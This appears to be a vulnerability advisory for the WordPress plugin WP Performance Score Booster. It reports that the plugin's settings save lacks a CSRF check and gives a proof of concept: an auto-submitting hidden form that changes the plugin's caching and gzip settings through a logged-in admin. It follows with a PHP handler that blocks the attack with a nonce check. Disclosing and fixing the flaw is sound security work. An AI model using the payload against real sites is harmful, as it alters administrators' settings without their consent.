The plugin does not have a CSRF check when saving its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
<form action="https://example.com/wp-admin/options-general.php?page=wp-performance-score-booster&tab=settings" method="post" id="csrf">
    <input name="wppsb_submit_hidden" value="Y" type="hidden">
    <input name="wppsb_remove_query_strings" value="on" type="hidden">
    <input name="wppsb_enable_gzip" value="on" type="hidden">
    <input name="wppsb_expire_caching" value="off" type="hidden">
    <input name="wppsb_instant_page_preload" value="off" type="hidden">
</form>
<script>csrf.submit()</script>
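A settings handler that rejects the request above, as an added example and not the plugin's own code: the form embeds a WordPress nonce and the save path verifies it before writing anything. The function name, nonce action, nonce field name, and the use of the form field names as option names are assumptions; the code is meant to run inside the WordPress admin.

```php
<?php
// Added example (not the plugin's code). Names below are hypothetical.
const WPPSB_NONCE_ACTION = 'wppsb_save_settings'; // assumed nonce action
const WPPSB_NONCE_FIELD  = 'wppsb_nonce';         // assumed nonce field name

// Field names taken from the proof of concept; assumed to match option names.
function wppsb_example_fields() {
    return array(
        'wppsb_remove_query_strings',
        'wppsb_enable_gzip',
        'wppsb_expire_caching',
        'wppsb_instant_page_preload',
    );
}

function wppsb_example_settings_page() {
    // Capability check: only administrators may view or save settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to manage these settings.' );
    }

    if ( isset( $_POST['wppsb_submit_hidden'] ) && 'Y' === $_POST['wppsb_submit_hidden'] ) {
        // CSRF check: stops with an error page unless the request carries a
        // valid nonce for this user and action. A cross-site form cannot
        // supply one, so the auto-submitted request never reaches the save.
        check_admin_referer( WPPSB_NONCE_ACTION, WPPSB_NONCE_FIELD );

        foreach ( wppsb_example_fields() as $name ) {
            $raw = isset( $_POST[ $name ] )
                ? sanitize_text_field( wp_unslash( $_POST[ $name ] ) )
                : 'off';
            // Store only the two expected values.
            update_option( $name, 'on' === $raw ? 'on' : 'off' );
        }
    }
    ?>
    <form method="post">
        <?php wp_nonce_field( WPPSB_NONCE_ACTION, WPPSB_NONCE_FIELD ); ?>
        <input type="hidden" name="wppsb_submit_hidden" value="Y">
        <?php foreach ( wppsb_example_fields() as $name ) : ?>
            <label>
                <input type="checkbox" name="<?php echo esc_attr( $name ); ?>" value="on"
                    <?php checked( 'on', get_option( $name, 'off' ) ); ?>>
                <?php echo esc_html( $name ); ?>
            </label><br>
        <?php endforeach; ?>
        <?php submit_button(); ?>
    </form>
    <?php
}
```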
apple502j
apple502j
Yes
2021-10-18 (about 1 year ago)
2021-10-18 (about 1 year ago)
2022-04-11 (about 1 year ago)